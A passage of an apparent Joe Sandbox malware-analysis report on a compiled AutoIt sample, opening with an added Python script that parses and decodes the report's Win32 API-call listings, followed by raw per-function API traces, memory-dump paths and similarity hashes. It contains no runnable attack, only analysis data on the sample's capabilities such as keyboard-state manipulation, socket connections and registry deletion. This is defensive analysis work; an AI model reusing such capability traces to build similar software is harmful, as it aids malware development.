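Added example for this report page; it is not Joe Sandbox code. The sample lines
are copied from this section, the constant tables are documented Win32 values,
and every function name below is this example's own."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# WSOCK32.DLL exports referenced by ordinal (Winsock 1.1 ordinal table, subset).
WSOCK32_ORDINALS = {9: "htons", 11: "inet_ntoa", 16: "recv", 17: "recvfrom",
                    18: "select", 19: "send", 20: "sendto", 23: "socket"}
# Window/control messages seen in this listing's SendMessageW/PostMessageW calls.
WINDOW_MESSAGES = {0x00A1: "WM_NCLBUTTONDOWN", 0x00B0: "EM_GETSEL",
                   0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK",
                   0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
# Virtual-key codes used as wParam of WM_KEYDOWN/WM_KEYUP (the four modifiers).
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

# Two line shapes occur in the listing:
#   "• PostMessageW.USER32(?,00000101,00000010,?), ref: 00121030"
#   "  • Part of subcall function 0011A7E9: _strlen.LIBCMT ref: 0011A7F3"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)


def _hexarg(arg: str) -> Optional[int]:
    """Numeric value of one argument, or None for the listing's '?' placeholder."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines

    def describe(self) -> str:
        """Call rendered with ordinal imports and known constants decoded."""
        name = self.api
        if self.module == "WSOCK32" and name.startswith("#"):
            name = WSOCK32_ORDINALS.get(int(name[1:]), name)   # "#17" -> recvfrom
        args = list(self.args)
        if name in ("SendMessageW", "PostMessageW") and len(args) >= 3:
            msg = _hexarg(args[1])
            if msg in WINDOW_MESSAGES:
                args[1] = WINDOW_MESSAGES[msg]
                if msg in (0x0100, 0x0101):           # wParam is a virtual-key code
                    args[2] = VIRTUAL_KEYS.get(_hexarg(args[2]), args[2])
        return f"{name}.{self.module}({','.join(args)})"


def parse_listing(text: str) -> list[ApiCall]:
    """Parse every API line of one function entry; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"),
            args=raw.split(",") if raw else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def releases_modifier_keys(calls: list[ApiCall]) -> bool:
    """True when the entry posts WM_KEYUP for Shift, Ctrl, Alt and the Win key,
    the pattern of the two PostMessageW entries in this section."""
    released = {_hexarg(c.args[2]) for c in calls
                if c.api == "PostMessageW" and len(c.args) >= 3
                and _hexarg(c.args[1]) == 0x0101}
    return set(VIRTUAL_KEYS) <= released


# Sample entries copied from this section of the report.
KEYBOARD_ENTRY = """\
• GetParent.USER32(?), ref: 00120F8C
• GetKeyboardState.USER32(?), ref: 00120FA1
• SetKeyboardState.USER32(?), ref: 00121002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00121030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0012104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00121095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 001210B8
"""
SOCKET_ENTRY = """\
• __WSAFDIsSet.WSOCK32(00000000,?), ref: 00136C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00136C21
• WSAGetLastError.WSOCK32(00000000), ref: 00136C34
  • Part of subcall function 0011A7E9: _strlen.LIBCMT ref: 0011A7F3
"""

if __name__ == "__main__":
    for entry in (KEYBOARD_ENTRY, SOCKET_ENTRY):
        calls = parse_listing(entry)
        for c in calls:
            print(f"{c.ref:08X}  {c.describe()}")
        print("releases all modifier keys:", releases_modifier_keys(calls))
```

Run stand-alone, the script prints each call with the constants named (for example `00121030  PostMessageW.USER32(?,WM_KEYUP,VK_SHIFT,?)` and `00136C21  recvfrom.WSOCK32(00000000,?,?,00000000,?,00000010)`). Only messages and keys that actually occur in this section are in the tables; anything else is printed as the listing shows it, so the decoder never guesses a name for an unknown value. The modifier-release check is a pattern match on the listing, not a verdict: the same sequence is what a GUI-automation runtime emits to reset Shift/Ctrl/Alt/Win before synthesising input, which is consistent with the "compiled AutoIt script" signature at the top of this report.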
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: a17ccd049b9646b5722e73e2c6f4d7e3d1c19eea7a962121f8027d620d618771
                                                        • Instruction ID: 36c400978e34aa426164d4132bcc4b02f568913c77231fa3d3b6127a1efb4636
                                                        • Opcode Fuzzy Hash: a17ccd049b9646b5722e73e2c6f4d7e3d1c19eea7a962121f8027d620d618771
                                                        • Instruction Fuzzy Hash: 0341D466C106547ACB11EBB59C8A9CFB7BC9F04310F508866E508F3222FB34E355C7AA
                                                        APIs
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00123697,?), ref: 0012468B
                                                          • Part of subcall function 0012466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00123697,?), ref: 001246A4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 001236B7
                                                        • _wcscmp.LIBCMT ref: 001236D3
                                                        • MoveFileW.KERNEL32(?,?), ref: 001236EB
                                                        • _wcscat.LIBCMT ref: 00123733
                                                        • SHFileOperationW.SHELL32(?), ref: 0012379F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: c258551e8b0a4e49b71fe8fa3c13dcec45e022dc79c4943fd37ad225d28509e2
                                                        • Instruction ID: 42060e4644de1217cb7ac6b636618d115d16f7709b6ad955003c795614e593f2
                                                        • Opcode Fuzzy Hash: c258551e8b0a4e49b71fe8fa3c13dcec45e022dc79c4943fd37ad225d28509e2
                                                        • Instruction Fuzzy Hash: C8418171508354AEC756EF64D8419DF77ECAF89380F50082EB49AC3251EB38D799C752
                                                        APIs
                                                        • _memset.LIBCMT ref: 001472AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00147351
                                                        • IsMenu.USER32(?), ref: 00147369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001473B1
                                                        • DrawMenuBar.USER32 ref: 001473C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: b19a24f4f31359292ed5d01fba05968ff308749579b923cb271ed4c05e5bc265
                                                        • Instruction ID: a82cc0ca500d15a4fb2a75e0a3bcf42b366451f76e867aba929a434d47e199ee
                                                        • Opcode Fuzzy Hash: b19a24f4f31359292ed5d01fba05968ff308749579b923cb271ed4c05e5bc265
                                                        • Instruction Fuzzy Hash: 1D410575A04209EFDB20DF61D884EAABBF9FB09350F148529FD55AB2A0D730AD50DF60
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00140FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00140FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 001410B5
                                                          • Part of subcall function 00140FA5: RegCloseKey.ADVAPI32(?), ref: 0014101B
                                                          • Part of subcall function 00140FA5: FreeLibrary.KERNEL32(?), ref: 0014106D
                                                          • Part of subcall function 00140FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00141090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00141058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: 3687a217598a4ca3bc5bb309699cfb5413da5dc981805ea4b21e1e5e98778c29
                                                        • Instruction ID: bc558bd925c70e86af5a3cb62b158ad984fe6bb7b5badf94d4da8bcdd1cb1e7e
                                                        • Opcode Fuzzy Hash: 3687a217598a4ca3bc5bb309699cfb5413da5dc981805ea4b21e1e5e98778c29
                                                        • Instruction Fuzzy Hash: E931FB75901109BFDB159F90DC89EFEB7BCEF09350F000169F511A3261EB759EC99AA0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001462EC
                                                        • GetWindowLongW.USER32(01444A18,000000F0), ref: 0014631F
                                                        • GetWindowLongW.USER32(01444A18,000000F0), ref: 00146354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00146386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001463B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 001463C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001463DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: d9b42737efdcb0bbec675c9a2e6ed1da8d2ba424bb9712e08d64879e14558f61
                                                        • Instruction ID: 8749af41dd0e9777c93dee4bb1d5fde91c06a55852daf98a3e351f39ee54b549
                                                        • Opcode Fuzzy Hash: d9b42737efdcb0bbec675c9a2e6ed1da8d2ba424bb9712e08d64879e14558f61
                                                        • Instruction Fuzzy Hash: FF31F138644290AFDB20CF19DC88F5937E1FB4B758F1901A9F5099F6B2CB71AC819B52
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DB2E
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DB54
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0011DB57
                                                        • SysAllocString.OLEAUT32(?), ref: 0011DB75
                                                        • SysFreeString.OLEAUT32(?), ref: 0011DB7E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0011DBA3
                                                        • SysAllocString.OLEAUT32(?), ref: 0011DBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 5b73ad22bdc9692ce3fe5e3c85e4789390e4e50e56744a045735b1e3b3dc6aff
                                                        • Instruction ID: dbffd4f15b2262c637ed2d22db3134e1e9f266f22146d066c613bb084c172121
                                                        • Opcode Fuzzy Hash: 5b73ad22bdc9692ce3fe5e3c85e4789390e4e50e56744a045735b1e3b3dc6aff
                                                        • Instruction Fuzzy Hash: A0218E76604219AFDF14DFA9EC88CFB73ACEB0A360B058539F915DB261DB709C818764
                                                        APIs
                                                          • Part of subcall function 00137D8B: inet_addr.WSOCK32(00000000), ref: 00137DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 001361C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001361D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0013620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00136217
                                                        • WSAGetLastError.WSOCK32 ref: 00136221
                                                        • closesocket.WSOCK32(00000000), ref: 0013624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00136263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: cce785949c8cfad44c0d72559eb3c49e7821a0ca6db3757e26a7d982d7bd26c9
                                                        • Instruction ID: 29c3a40a6292b392f9183b85b119d39ad4c1f5d16785974879152d82d073e9cb
                                                        • Opcode Fuzzy Hash: cce785949c8cfad44c0d72559eb3c49e7821a0ca6db3757e26a7d982d7bd26c9
                                                        • Instruction Fuzzy Hash: A731A175600118AFEF10AF64CC89FBE7BA9EB45750F05802DF905AB292CB74AC458BA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 2dcc6f9adecedc8bc102f8164fc0c39858d9324238787d68e88357bf97a68418
                                                        • Instruction ID: 0ab5cb7e7729869ef4686cc8df107f2cd6a9262a5d863a49c18d66f399616032
                                                        • Opcode Fuzzy Hash: 2dcc6f9adecedc8bc102f8164fc0c39858d9324238787d68e88357bf97a68418
                                                        • Instruction Fuzzy Hash: 5E213AB22046516AD238A635AC02EEB7398DF56340F10403DF84697192EB515DC7C295
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DC09
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DC2F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0011DC32
                                                        • SysAllocString.OLEAUT32 ref: 0011DC53
                                                        • SysFreeString.OLEAUT32 ref: 0011DC5C
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0011DC76
                                                        • SysAllocString.OLEAUT32(?), ref: 0011DC84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 6d1f2bef5a81ea7376782d54436e5d0a91354bd0d7719d9f8b12ef39cd8d1181
                                                        • Instruction ID: 1536cf7cd2b6f7ea577808d001aa43bdee56f8f4152ff36988784b53b89d9846
                                                        • Opcode Fuzzy Hash: 6d1f2bef5a81ea7376782d54436e5d0a91354bd0d7719d9f8b12ef39cd8d1181
                                                        • Instruction Fuzzy Hash: F8216035604204AF9B149FA8EC89DEB77ECEB09360B158539F915CB261DBB0DC81CBA4
                                                        APIs
                                                          • Part of subcall function 000C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000C1D73
                                                          • Part of subcall function 000C1D35: GetStockObject.GDI32(00000011), ref: 000C1D87
                                                          • Part of subcall function 000C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C1D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00147632
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0014763F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0014764A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00147659
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00147665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 96cdd538b4e191e0a4b17f34de67e7492c17605b5dfdc0b23fa7bb450e5c8f09
                                                        • Instruction ID: 2142f989de7d3c16f94674d2dfbc10b1e00d3def0f6f3f44e8dac02aef225931
                                                        • Opcode Fuzzy Hash: 96cdd538b4e191e0a4b17f34de67e7492c17605b5dfdc0b23fa7bb450e5c8f09
                                                        • Instruction Fuzzy Hash: 3B11B6B1110119BFFF158F64CC85EE7BF6EEF08798F014114B604A60A0CB729C21DBA4
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 000E9AE6
                                                          • Part of subcall function 000E3187: EncodePointer.KERNEL32(00000000), ref: 000E318A
                                                          • Part of subcall function 000E3187: __initp_misc_winsig.LIBCMT ref: 000E31A5
                                                          • Part of subcall function 000E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000E9EA0
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000E9EB4
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000E9EC7
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000E9EDA
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000E9EED
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000E9F00
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000E9F13
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000E9F26
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000E9F39
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000E9F4C
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000E9F5F
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000E9F72
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000E9F85
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000E9F98
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000E9FAB
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000E9FBE
                                                        • __mtinitlocks.LIBCMT ref: 000E9AEB
                                                        • __mtterm.LIBCMT ref: 000E9AF4
                                                          • Part of subcall function 000E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000E9AF9,000E7CD0,0017A0B8,00000014), ref: 000E9C56
                                                          • Part of subcall function 000E9B5C: _free.LIBCMT ref: 000E9C5D
                                                          • Part of subcall function 000E9B5C: DeleteCriticalSection.KERNEL32(0017EC00,?,?,000E9AF9,000E7CD0,0017A0B8,00000014), ref: 000E9C7F
                                                        • __calloc_crt.LIBCMT ref: 000E9B19
                                                        • __initptd.LIBCMT ref: 000E9B3B
                                                        • GetCurrentThreadId.KERNEL32 ref: 000E9B42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associassociated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: 7ffd43cba987decbbf174081ea2237008efa664d75946834edd7b839879446c0
                                                        • Instruction ID: e8f866fd0462da37343e2ef30c28485fc061ab4a21e3349d9d80707851dc1bb6
                                                        • Opcode Fuzzy Hash: 7ffd43cba987decbbf174081ea2237008efa664d75946834edd7b839879446c0
                                                        • Instruction Fuzzy Hash: 54F0F03260D3A12EE7B4B777BC036CA26D19F02734F210A2DF564F61E3EF20848101A1
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000E3F85), ref: 000E4085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000E408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 000E4097
                                                        • DecodePointer.KERNEL32(000E3F85), ref: 000E40B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: cbbf1276e2056119547f33c606805eee99bdc9d35b751283e907ed8f0ddef8a0
                                                        • Instruction ID: e72ae330d7c976ae4ad7276c1be6d0efeeb503bcc72c27d6809a1dced6410721
                                                        • Opcode Fuzzy Hash: cbbf1276e2056119547f33c606805eee99bdc9d35b751283e907ed8f0ddef8a0
                                                        • Instruction Fuzzy Hash: 32E0B674581300EFEB60AFA1EC0DB053AE4B706F42F144028F521E5AB0CBB68785DB24
                                                        APIs
                                                        Memory Dump Source
